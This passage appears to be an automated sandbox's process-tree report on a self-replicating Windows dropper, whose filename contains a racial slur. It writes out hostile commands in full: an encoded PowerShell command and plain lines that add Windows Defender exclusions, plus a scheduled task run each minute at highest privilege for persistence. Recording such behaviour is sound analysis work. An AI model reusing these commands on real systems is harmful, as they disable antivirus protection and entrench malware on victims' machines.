    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2724
- - C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
    "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2560
  - - C:\Users\Admin\AppData\Local\Temp\msedge.exe
      "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2324
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3956
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3392
  - - C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
      "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2196
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1992
    - - C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
    - - C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2892
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
      - C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
      - C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        7⤵
        Loads dropped DLL
        
        PID:1028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        8⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1196
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        9⤵
        Loads dropped DLL
        
        PID:1552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        10⤵
        Loads dropped DLL
        
        PID:1480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        11⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        11⤵
        Loads dropped DLL
        
        PID:1428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        12⤵
        Loads dropped DLL
        
        PID:1940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        13⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        13⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        14⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        14⤵
        Loads dropped DLL
        
        PID:1556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        15⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        15⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2144
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        16⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:804
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        16⤵
        Loads dropped DLL
        
        PID:2468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        17⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        17⤵
        Loads dropped DLL
        
        PID:916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        18⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        18⤵
        Loads dropped DLL
        
        PID:2904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        19⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        19⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        20⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        20⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        21⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1280
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        21⤵
        Loads dropped DLL
        
        PID:2372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        22⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        22⤵
        Loads dropped DLL
        
        PID:2072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        23⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        23⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        24⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2576
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        24⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2300
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        25⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:860
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        25⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
